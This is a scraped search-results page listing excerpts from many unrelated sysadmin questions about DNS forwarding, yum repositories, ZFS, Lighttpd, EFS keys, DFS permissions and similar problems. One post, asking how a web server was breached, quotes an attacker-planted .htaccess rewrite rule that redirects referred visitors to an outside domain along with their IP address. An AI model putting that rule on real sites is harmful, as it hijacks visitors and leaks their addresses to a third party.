Search Results

Search found 24334 results on 974 pages for 'directory loop'.

Page 853/974 | < Previous Page | 849 850 851 852 853 854 855 856 857 858 859 860  | Next Page >

  • DNS caching server config problem

    - by Alex
    I have a Bind DNS caching-only server setup that is working. I am bringing up a new AD domain controller that will also be a DNS server for that AD but I don't want it responding to any DNS queries except those that are AD related. So, my goal is to leave this caching server as the primary DNS server for stations on the network and have it forward requests for the AD domain to the domain controller. My understanding is that I just need a forward zone for that domain pointing to the domain controller. However it does not seem to be working. So that leaves me to think that my caching server is not forwarding properly. For example, this AD is going to have a naming convention of hostname.mydomain.local. If I do an nslookup and specify the domain controller's IP address as the server, I can query addresses that exist in DNS on that server, such as dc1.mydomain.local. However, queries to my caching server times out (I get a response from the caching server if I query mydomain.local but none of the objects in that domain). Any suggestions? Here is my named.conf file: options { directory "/var/named"; listen-on { 192.168.0.14; 127.0.0.1; }; forwarders { ; ; }; forward first; }; zone "." in { type hint; file "db.cache"; }; zone "0.0.127.in-addr.arpa" in { type master; file "db.127.0.0"; }; //forward zone for mydomain.local zone "mydomain.local" { type forward; forwarders { 192.168.1.21; }; };

    Read the article

  • How do I get yum to see updates to a local repo without cleaning cache?

    - by Matt
    I have set up a local yum repository which I use to install test builds. For the testing purposes, my packages are versioned by <svn version number>.<date>.<time> (e.g. 12345.20110908.150404 The trouble is, once I make a new RPM, copy it to the repository directory and run createrepo $REPO_DIR, yum does not see the new RPM as being available. $ cd $REPO_DIR $ ls -1 repodata package-12345.20110908.150404-1.x86_64.rpm package-12345.20110908.174329-1.x86_64.rpm $ createrepo . # ...snip... $ rpm -q package package-12345.20110908.150404-1.x86_64 $ yum list --showduplicates package Installed Packages package.x86_64 12345.20110908.150404-1 @repo Available Packages package.x86_64 12345.20110908.150404-1 repo I can see the updates and grab them if I run yum clean all and then re-fetch the metadata, but I think this just means I need to be doing something else from the repo, as I don't have to do that for other yum repos. How do I need to set up my local repository so that I only need to run yum update from the client without having to clean my yum cache?

    Read the article

  • How would I write a terminal command to download a folder with wget from a Media Temple (gs) server?

    - by racl101
    I'm trying to download a folder using wget on the Terminal (I'm usin a Mac if that matters) because my ftp client sucks and keeps timing out. It doesn't stay connected for long. So I was wondering if I could use wget to connect via ftp protocol to the server to download the directory in question. I have searched around in the internet for this and have attempted to write the command but it keeps failing. So assuming the following: ftp username is: [email protected] ftp host is: ftp.s12345.gridserver.com ftp password is: somepassword I have tried to write the command in the following ways: wget -r ftp://[email protected]:[email protected]/path/to/desired/folder/ wget -r ftp://serveradmin:[email protected]/path/to/desired/folder/ When I try the first way I get this error: Bad port number. When I try the second way I get a little further but I get this error: Resolving s12345.gridserver.com... 71.46.226.79 Connecting to s12345.gridserver.com|71.46.226.79|:21... connected. Logging in as serveradmin ... Login incorrect. What could I be doing wrong?

    Read the article

  • Cannot destroy ZFS snapshot: dataset already exists

    - by Morven
    I have a server (T5220, though I doubt it matters) running Solaris 10 8/07 and I have a ZFS pool, "mysql", on internal disk. Within it I have a filesystem "mysql/data/4.1.12", which I snapshot hourly with a script from cron. I have one snapshot, created as one of those hourly snaps, that will not destroy. I have renamed it out of sequence to be "mysql/data/4.1.12@wibble" so that my script will not try and fail to destroy it, but it was originally within the sequence, though I doubt that matters. It renames successfully. The snapshot can be successfully navigated and read from through the .zfs/snapshots directory. It has no clones based on it. Trying to destroy it does this: (265) root@web-mysql4:/# zfs destroy mysql/data/4.1.12@wibble cannot destroy 'mysql/data/4.1.12@wibble': dataset already exists (266) root@web-mysql4:/# which is apparently nonsensical: of course it already exists, that's the point! Anyone seen anything like this before? Web searches show nothing obviously similar. I can provide patches installed if necessary.

    Read the article

  • How can I have Vhosts with Lighttpd on Windows and keeping PHP through mod_cgi ?

    - by Pixelastic
    Hello, I installed Lighty on Windows 7 and managed to get it correctly serve both static and PHP files (through mod_cgi). At first I got the "No input file selected" message displayed when requesting a .php file. So, I updated the doc_root value in my php.ini to match the server.document-root defined in my Lighty config, and PHP stops complaining. Then I defined a VHost to point all foo.com requests to a specific dir. It worked well for all static files but when requesting a .php file, the mod_cgi was still picking files from the doc_root defined in php.ini, not in the directory I defined for server.document-root in my Vhost. I know its what's supposed to happen, PHP follows the config defined in php.ini. And I have to set this value in my php.ini otherwise no php is processed at all. What I don't understand is how I'm supposed to have virtual hosts with mod_cgi enabled here ? I tried adding [HOST=foo.com] section in the php.ini without any luck. I tried mod_fastcgi but could'n get it to work at all, I also tried mod_simple_host but could get it handle php. I managed to get it working by copying my PHP install to another dir (and changing the doc_root value) and adding a cgi.assign pointing to that install in my vhost. But this is a really hackish way, it means having one PHP install for each virtualhost. Note that I'm working on a development machine running Windows, this is not a production server, I just wanted to emulate the final Server config locally to test some changes. I googled a lot this problem but all I can find are people installing Lighty on windows with mod_cgi, or installing Lighty on Windows with virtual hosts, but I never found anyone who managed to get both.

    Read the article

  • Input/output error reading USB backup drive on CentOS 6.4

    - by Kev
    I'm suddenly seeing some strange behaviour on our USB backup drive that doesn't make sense to me: (2013-10-21 14:58:23 [root@newdc /]$ cd /mnt/backup/ (2013-10-21 14:59:03 [root@newdc backup]$ ls -la ls: reading directory .: Input/output error total 0 (2013-10-21 14:59:05 [root@newdc backup]$ df -h /mnt/backup Filesystem Size Used Avail Use% Mounted on /dev/sda1 917G 843G 28G 97% /mnt/backup How is it possible for the OS to know how much is in use, but I can't ls any of it as root? Or more to the point, what problem does this indicate? /var/log/messages said this: Oct 21 14:57:54 g5 kernel: EXT4-fs error (device sda1): ext4_journal_start_sb: Detected aborted journal Oct 21 14:57:54 g5 kernel: EXT4-fs (sda1): Remounting filesystem read-only But...read-only is something different than 'throw an io error'... After unmounting to try fsck on it, I had someone on-site look at it, and the drive was not spun up, and had a slow-flashing light, which I believe means it was in a power-suspend mode. So I had them unplug and replug the USB cable, and now (before remounting) it says: fsck from util-linux-ng 2.17.2 e2fsck 1.41.12 (17-May-2010) /dev/sda1: clean, 2805106/61046784 files, 181934167/244182016 blocks I then mount it and now ls works and df reports: Filesystem Size Used Avail Use% Mounted on /dev/sda1 917G 680G 191G 79% /mnt/backup What would cause it to go into such a state without being asked to? Why all the weird behaviour, and now it appears to not be corrupt?

    Read the article

  • Changing the View of a Folder When It Is Opened from Finder

    - by user60044
    When I was running OS 10.4 I had all my folders beautifully organized with position and which ones should be opened in View mode and which one in Icon, etc. When I transitioned to 10.6 I found that OS ignored all that information and imposes an awful consequence of changing the view for some folder and that view moving up to all parent folders which don't have their views locked. The only way I can think of to get this functionality back is to either write a program that given a root directory will enumerate it setting the views based upon a static template I have. The other way I thought I could accomplish this is by Folder Actions. Aside from the fact that I don't know AppleScript it seems folder actions cannot be inherited. Since I have 1000s of folders involved here, all being inherited from a single root, I could not possibly manually add that action to each of those folders. What I would like to have is a folder action that whenever I open the folder from Finder, then if it contains any JPG, GIF, etc. type image files that it will automatically open that folder with a view of Icon with a reasonable size to support the number of images. If the folder contains only folders, then to open that folder in the list view. Does anyone have anything that could do this for me? Thank You, -- Mark

    Read the article

  • File permissions on web server

    - by plua
    I have just read this useful article on files permissions, and I am about to implement a as-strict-as-possible file permissions policy on our webserver. Our situation: we have a web server accessed through sftp by different users from within our company, and we have the general public accessing Apache - sometimes uploading files through PHP. I distinguish folders and files by their use. So based on this reading, here is my plan: All people who need to upload files will have separate users. But all of those users will belong to two groups: uploaders, and webserver. Apache will belong to the group webserver. Directories Permission: 771 Owner: user:uploaders Explanation: to access files in the folder, everybody needs to have execute permission. Only uploaders will be adding/removing files, so they also get r+w permission. Files within the web-root Permission: 664 Owner: user:uploaders Explanation: they will be uploaded and changed by different users, so both owner and group need to have w+r permissions. Webserver needs to only read files, so r permission only. Upload-directories Permission: 771 Owner: user:webserver Explanation: when files need to be uploaded, Apache needs to be able to write to this directory. But I figure it is safer to change the owner to webroot, thus giving Apache sufficient privileges (and all uploaders also belong to this group and will have the same permissions), while safeguarding from "others" writing to this folder. Uploaded files Permission: 664 Owner: user:webserver Explanation: after uploading Apache might need to delete files, but this is no problem because they have w+r permission of the folder. So no need to make this file any more accessible than r access for group. Being not an expert on file permissions, my question is whether or not this is the best possible policy for our situation? Any suggestions welcome.

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • Copied a file with winscp; only winscp can see it

    - by nilbus
    I recently copied a 25.5GB file from another machine using WinSCP. I copied it to C:\beth.tar.gz, and WinSCP can still see the file. However no other app (including Explorer) can see the file. What might cause this, and how can I fix it? The details that might or might not matter WinSCP shows the size of the file (C:\beth.tar.gz) correctly as 27,460,124,080 bytes, which matches the filesize on the remote host Neither explorer, cmd (command line prompt w/ dir C:\), the 7Zip archive program, nor any other File Open dialog can see the beth.tar.gz file under C:\ I have configured Explorer to show hidden files I can move the file to other directories using WinSCP If I try to move the file to Users/, UAC prompts me for administrative rights, which I grant, and I get this error: Could not find this item The item is no longer located in C:\ When I try to transfer the file back to the remote host in a new directory, the transfer starts successfully and transfers data The transfer had about 30 minutes remaining when I left it for the night The morning after the file transfer, I was greeted with a message saying that the connection to the server had been lost. I don't think this is relevant, since I did not tell it to disconnect after the file was done transferring, and it likely disconnected after the file transfer finished. I'm using an old version of WinSCP - v4.1.8 from 2008 I can view the file properties in WinSCP: Type of file: 7zip (.gz) Location: C:\ Attributes: none (Ready-only, Hidden, Archive, or Ready for indexing) Security: SYSTEM, my user, and Administrators group have full permissions - everything other than "special permissions" is checked under Allow for all 3 users/groups (my user, Administrators, SYSTEM) What's going on?!

    Read the article

  • InstallShield or Windows installer corrupted

    - by Bobby S
    Just recently I've been unable to install any software on my Windows 7 machine. Anything that uses InstallShield or the Windows installer will just hang or give a weird error. I noticed there will be many duplicate isbew64.exe processes (like 25) that launch and then just sit there or else a lot of msiexec.exe *32 processes, depending on what I'm trying to install. One piece of software specifically is the Logitech Harmony software. It gives me an *is_string_not_defined* error, saying c:\program files (x86)\:\ the filename, directory name, or volume label syntax is incorrect. The other thing I was trying to install was Battlefield: Bad Company 2, and that just hangs as well, and then just leaves all the Windows installer processes running in the background after I quit the install process. Very odd. I've checked well and googled these issues, it doesn't appear to be any sort of malware issue. I feel like it's related to some kind of corrupted installer application. I've rebooted, deleted the InstallShield folder in program files/common files as some places online suggested but to no avail. I have no idea what to do, any ideas?

    Read the article

  • Join Domain from VM

    - by Adis
    I have two VMs running on VMWare Player. I use NAT adapter settings. The host machine for VMs is running on corporate network. First VM has Domain controller running and I can log in on that machine using domain credentials. I named domain wm.local When I run IP config on this machine: IP: 192.168.87.132 Def Gataway: 192.168.87.2 DNS server: 192.168.87.2 DHCP server: 192.168.87.254 Second VM cannot join domain. When I try it with domain WM I'm propmted for credentials. And I enter Administrator credentials and than it waits for some time and I get response: "The specified domain either does not exist or could not be contacted" If i type wm.local as domain when trying to join it does not prompt me to login but just shows "An Active Directory Domain Controller (AD DC) for the domain wm.local could not be contacted. And here it takes no time to get this error message. Ipconfig on this machine: IP: 192.168.87.134 Def Gataway: 192.168.87.2 DNS server: 192.168.87.2 DHCP server: 192.168.87.254 I can ping second VM from first one. And I disabled firewalls on both machines. Any ideas? Is there any manual for this?

    Read the article

  • DFS Root namespace is RDWR for all users

    - by Patrick
    We have an existing DFS Replication and Namespace group that we use to serve the company's files. This has been operating fine for us for some time now, and continues to do so. however a situation arose yesterday afternoon that has led us to be stumped. The problem is that we have our name space presented as : \\domain.co.uk\public\[8 or 9 folders that are mapped to the users in the business] We had a problem this morning that meant that a number of users started mapping their AD Home Drive directly to the \\domain.co.uk\public directory and we found that they had read/write. This rapidly became a problem as a at least one director saved some moderately sensitive documents in there and basically anyone could read them. I've tidied up that specific problem with some deft scripting and a slight modification of group policy. However I would like to make \public read only, the trouble is I can't work out where the ACLs for that folder would be held. All the folders that are presented as \\domain.co.uk\public\[folder] are 'real' folders on logical volumes on our DFS servers so are secured with groups that are applied via the 'security' tab. I'd like to do the same on \public but I can't find it. I have looked through amongst other things \Sysvol\domain.co.uk but can't find it and after a lot of clicking and a bit of reading I can't see how to lock it down. Any thoughts?

    Read the article

  • Nexenta, NFS and LOCK_EX

    - by Givre
    I'm currently using an LAMP architecture and I expect a big problem :( I have several http web server using PHP5. All are mounting via NFS (v3) the directory for all the hosted websites. The file server is running the Nexenta Storage Appliance using ZFS . The problem is all the NFS client trying to write something in a file over the NFS get this problem : This is inside the apache2 process: open("/nfs/website1/file.txt", ORDWR|OCREAT, 0600) = 11647 fstat(11647, {stmode=SIFREG|0600, st_size=23754, ...}) = 0 flock(11647, LOCK_EX And the process never get the LOCK and keep waiting for... always. The effect? All the apache2 procces get used and waiting.. my severs can't still proccess the others requests because there is no more proccess available. I don't now where to find a solution.. for me it.'s on the NFS server side.. but wich configuration is wrong or missing ? How can I find what is wrong? If you need more information about the configuration, just ask me what can help you more :)

    Read the article

  • Getting the EFS Private Key out of system image

    - by thaimin
    I had to recently re-install Windows 7 and I lost my exported private key for EFS. I however have the entirety of my user directory and my figuring that the key must be in there SOMEWHERE. The only question is how to get it out. I did find the PUBLIC keys in AppData\Roaming\Microsoft\SystemCertificates\My\Certificates If I import them using certmg.msc it says I do have the private key in the information, but if I try export them it says I do not have the private key. Also, decryption of files doesn't work. There is also a "keys" folder at AppData\Roaming\Microsoft\SystemCertificates\My\Keys. After importing the certificates I copy those over into my new installation but it has no effect. I am starting to believe they are either in AppData\Roaming\Microsoft\Protect\S-1-5-21-...\ or AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-...\ but I am unsure how to use the files in those folders. Also, since my SID has changed, will I be able to use them? The other parts of the account have remained the same (name and password). I also have complete access to the user registry hive and most of the old system files (including the old system registry hives). I do keep seeing references to "Key Recovery Agent" but have not found anything about using, just that it can be used. Thanks!

    Read the article

  • Unix sort 10x slower with keys specified

    - by KenFar
    My data: It's a 71 MB file with 1.5 million rows. It has 6 fields, four of which are strings of avg. 15 characters, two are integers. Three of the fields are sometimes empty. All six fields combine to form a unique key - and that's what I need to sort on. Sort statement: sort -t ',' -k1,1 -k2,2 -k3,3 -k4,4 -k5,5 -k6,6 -o a_out.csv a_in.csv The problem: If I sort without keys, it takes 30 seconds. If I sort with keys, it takes 660 seconds. I need to sort with keys to keep this generic and useful for other files that have non-key fields as well. The 30 second timing is fine, but the 660 is a killer. I could theoretically move the temp directory to SSD, and/or split the file into 4 parts, sort them separately (in parallel) then merge the results, etc. But I'm hoping for something simpler since these results are so bad as-is. Any suggestions?

    Read the article

  • Symlink path can be followed manually, but `cd` returns Permission denied

    - by Ricket
    I am trying to access the directory /usr/software/test/agnostic. There are several symlinks involved in this path. As you can see by the below transcript, I am unable to cd directly to the path, but I can check each step of the way and cd to the symlinked directories until I reach the destination. Why is this? (and how do I fix it?) Ubuntu 12.10, bash > ls /usr/software/test/agnostic ls: cannot access /usr/software/test/agnostic: Permission denied > cd /usr/software/test > cd agnostic bash: cd: agnostic: Permission denied > pwd -P /x/eng/localtest/arch/x86_64-redhat-rhel5 > ls -al | grep agnostic lrwxrwxrwx 1 root root 15 Oct 23 2007 agnostic -> noarch/agnostic > ls -al | grep noarch ... lrwxrwxrwx 1 root root 23 Oct 23 2007 noarch -> /x/eng/localtest/noarch > cd noarch > cd agnostic bash: cd: agnostic: Permission denied > ls -al | grep agnostic lrwxrwxrwx 1 5808 dip 4 Oct 5 2010 agnostic -> main > cd main > ls (correct output of `ls`) > pwd /usr/software/test/noarch/main > pwd -P /x/eng/localtest/noarch/main

    Read the article

  • Quick introduction to Linux needed

    - by 0xDEAD BEEF
    Hi guys! I have to get into Linux ASAP and realy mean ASAP. I have installed Cygwin but as allways - things dont go as easy as one would like. First problem i enconter was - i choose KDE package, but there is no sign of KDE files anywhere in cygwin folder. How do i run KDE windows. Currently startx fires, but all looks ugly! My desire is to download and run Qt Creator. Seems that there is no cygwin package, but downloading source and compiling is good to go. Only that i have forgoten every linux command i ever knew! :D Please - what are default commands u use on linux? What does exec do? what ./ stands for? What is directory strucutre and why there is such mess in bin folder? Thanks god - i have windows over cygwin, so downloading files is not a problem, but again -how do i unpack them in linux style and how to i build? simply issue "make" command from folder, where i extracted files? Please help!

    Read the article

  • Windows Server 2008 R2 creating a multi-year client certificate using the IIS certsrv page while deploying SSTP VPN

    - by Warren P
    I am trying to follow instructions on Technet about deploying a Standard (non-enterprise) SSTP based VPN) that were originally written for Server 2008, but I am using Server 2008 R2, I have gotten as far as the part where it asks you to create a request a Server Authentication certificate. I have deployed IIS, and Active Directory Certificate Services, and chose "Standalone" and "Standard" (non-enterprise) Certificate Authority because I don't have an OID and don't think I should have to get one for a simple deployment of SSTP. The resulting certificates made by the Certification Authority "Issue" command, only have a 1 year period of validity, I want a multi-year certificate. At no point in this process is there any way to input this information unless it's through the Attributes text input area on the Advance Certificate Request page, which appears to be generated using an old ActiveX control, which means I can only do this using the workarounds in the article that I linked at the top, and only using Internet Explorer. Update:: It may be that this question is pointless since self-signed keys do not appear to work, when I try them, using Windows 8 as the VPN client. The problem is that the keys that are self-created by the technique shown here do not have any Certificate Revocation Server URLs and so you get an error "The revocation function was unable to check revocation", and the VPN connection fails.

    Read the article

  • Group Policy - Published software not upgrading

    - by VokinLoksar
    I'm testing this with mercurial MSIs, but it's the same for other packages. I've created a new group policy and added an old version of mercurial to User software installation as a Published package. On a Windows 7 client I install the package through Programs and Features. The installation works fine. Now, I would like to publish an updated version of mercurial. I create a new Published package. Under 'Upgrades' I configure it to replace (upgrade also doesn't work) the old version and mark this upgrade as 'Required'. The old package is not removed. The Windows 7 client is then restarted. When I log back in, I see a status message saying something like 'Removing managed software Mercurial ...'. There is no message about installation of the upgrade. If I look in Programs and Features, I can see the new version of mercurial listed. However, the actual mercurial directory under Program Files is missing. It's as though the installation recorded information about the MSI, but didn't actually install anything after removing the old version. As I mentioned, this isn't specific to mercurial. I've tried using other apps and have yet to find one that can be upgraded via a Published package. Using Assigned packages in Computer Configuration works without problems, but I would like this software to be optional rather than required. Ideas?

    Read the article

  • How to copy a floppy boot disk?

    - by Sammy
    I have a floppy boot disk and I would like to copy it to preserve it, as a backup. If I have two floppy drives, A and B, how can I copy the disk? Assuming one has two floppy drives Can I simply insert the floppy disk in one of the drives and then an empty floppy disk in the other and issue a simple command like this one. A:\>copy . b: Will this only copy the contents of the current directory and none of the files in subdirectories? Do I have to explicitly specify the option to copy everything? Also, what about the boot information? That won't get copied, right? If one has only one floppy drive... How do you copy a floppy disk if you only have one floppy drive? Do you in fact have to copy its contents to the local hard drive C and then copy that to an empty floppy disk using the same floppy drive? A:\>copy . c:\floppydisk A:\> A:\>c: C:\> C:\>copy floppydisk a: C:\> I'm guessing I will need some type of disk image tool to really copy everything on a bootable floppy disk. Something like the dd command on Linux perhaps? Am I right?

    Read the article

  • Setting up test an dlive enviornment - how?

    - by Sean
    I am a bit new to servers and stuff so had a question. I have my development team working on my website. They are in different countries and currently they put all the work live on the test site. But the test site is open to anyone who knows the URL. It is behind a directory but this effects my QA process because i cannot use the accurate URL structures to prevent the general public from seeing it. So what I want to do it: Have my site live on the net but only for me and my team, so like an internal network. Also I will need to mirror this to my live site when i put it live. So i guess this is something like setting up a staging and live environment. So how to do it and are both environments on the same physical server or do i need to buy two servers? And if i setup a staging environment how will i access it and my team since we are all spread out so i assume we need to log into something to access it? What about the URL - do i need a different URL for the test site or can i use the same live url for the test site? I plan to get a dedicated server + CDN for my site.

    Read the article

  • auth user and exec a node app only with apache?

    - by Blame
    I couldn't find an answer on the web and I'm trying for days now so I hope that someone with more experience with apache can help me out. Iam writing an web editor and the user should be able to edit a file that is on the server in a directory the user has access to. The problem Iam facing is that I need to authenticate against the system users (shadow/passwd). So the user should be able to login whith a system account and then the node app which does all the logic should be started with the users rights. I hope to get this working without any additional script and only with Apache. I found out two things: I can use mod_auth_pam to authenticate the user There is a mod called suEXEC which can exec the node app with a specified user The problem is that I have to hard code which user is used by suEXEC but I want to decide when the user logs in. Is there any way to authenticate a user against the shadow/passwd and then exec a prog with the users rights? I dont want to run the node app as root and the user should only be able to access his own files. Any help would be appreciated! Thanks, Kodak

    Read the article

  • What are the best linux permissions to use for my website?

    - by Nic
    This is a Canonical Question about File Permissions on a Linux web server. I have a Linux web server running Apache2 that hosts several websites. Each website has its own folder in /var/www/. /var/www/contoso.com/ /var/www/contoso.net/ /var/www/fabrikam.com/ The base directory /var/www/ is owned by root:root. Apache is running as www-data:www-data. The Fabrikam website is maintained by two developers, Alice and Bob. Both Contoso websites are maintained by one developer, Eve. All websites allow users to upload images. If a website is compromised, the impact should be as limited as possible. I want to know the best way to set up permissions so that Apache can serve the content, the website is secure from attacks, and the developers can still make changes. One of the websites is structured like this: /var/www/fabrikam.com /cache /modules /styles /uploads /index.php How should the permissions be set on these directories and files? I read somewhere that you should never use 777 permissions on a website, but I don't understand what problems that could cause. During busy periods, the website automatically caches some pages and stores the results in the cache folder. All of the content submitted by website visitors is saved to the uploads folder.

    Read the article

  • Expire Files In A Folder: Delete Files After x Days

    - by Brett G
    I'm looking to make a "Drop Folder" in a windows shared drive that is accessible to everyone. I'd like files to be deleted automagically if they sit in the folder for more than X days. However, it seems like all methods I've found to do this, use the last modified date, last access time, or creation date of a file. I'm trying to make this a folder that a user can drop files in to share with somebody. If someone copies or moves files into here, I'd like the clock to start ticking at this point. However, the last modified date and creation date of a file will not be updated unless someone actually modifies the file. The last access time is updated too frequently... it seems that just opening a directory in windows explorer will update the last access time. Anyone know of a solution to this? I'm thinking that cataloging the hash of files on a daily basis and then expiring files based on hashes older than a certain date might be a solution.... but taking hashes of files can be time consuming. Any ideas would be greatly appreciated! Note: I've already looked at quite a lot of answers on here... looked into File Server Resource Monitor, powershell scripts, batch scripts, etc. They still use the last access time, last modified time or creation time... which, as described, do not fit the above needs.

    Read the article

< Previous Page | 849 850 851 852 853 854 855 856 857 858 859 860  | Next Page >